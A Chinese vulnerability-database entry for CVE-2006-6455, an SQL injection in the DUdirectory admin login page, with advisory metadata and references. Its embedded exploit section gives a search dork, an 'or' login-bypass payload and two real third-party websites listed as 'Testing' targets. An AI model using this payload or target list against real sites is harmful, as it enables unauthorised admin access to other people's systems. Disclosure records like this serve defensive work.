DUware DUdirectory 'default.asp' 多个SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1192557 漏洞类型 SQL注入
发布时间 2006-12-10 更新时间 2007-05-02
CVE编号 CVE-2006-6455 CNNVD-ID CNNVD-200612-212
漏洞平台 N/A CVSS评分 7.5
|漏洞来源
https://cxsecurity.com/issue/WLB-2006120087
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200612-212
|漏洞详情
DUwareDUdirectory3.1及可能DUdirectoryPro和ProSQL3.x中的admin/default.asp存在多个SQL注入漏洞,远程攻击者可通过(1)用户名或者(2)密码参数来执行任意SQL命令。
|漏洞EXP
#################################################
# DUdirectory Admin Panel  SQL Injection 
################################################
#Download:
#http://www.duware.com/zips/productsnew/DUdirectory31.zip
# Search:"DUdrirectory"  
# DUdirectory/admin/default.asp
# 
#  User:'or' Pass:'or'
#################################################
#  
#Testing;
http://www.euconvention.be/DUdirectory/admin/default.asp

http://www.pointoflife.com/cgi-bin/DUdirectory/admin/default.asp
#
# 
#################################################
#############C-W-M & HackerSecurity.Org##########
######Contact: Meftun[at]Meftunnet[dot]Com#######
#####Greetz: Eskobar , Doublekickx, Poizonb0x####
##############WWW.HACKERSECURITY.ORG#############
#################################################
|参考资料

来源:SECUNIA
名称:23275
链接:http://secunia.com/advisories/23275
来源:XF
名称:dudirectory-default-sql-injection(30783)
链接:http://xforce.iss.net/xforce/xfdb/30783
来源:BID
名称:21485
链接:http://www.securityfocus.com/bid/21485
来源:BUGTRAQ
名称:20061207DUdirectoryAdminPanelSQLInjection
链接:http://www.securityfocus.com/archive/1/archive/1/453809/100/0/threaded
来源:VUPEN
名称:ADV-2006-4908
链接:http://www.frsirt.com/english/advisories/2006/4908
来源:SREASON
名称:2017
链接:http://securityreason.com/securityalert/2017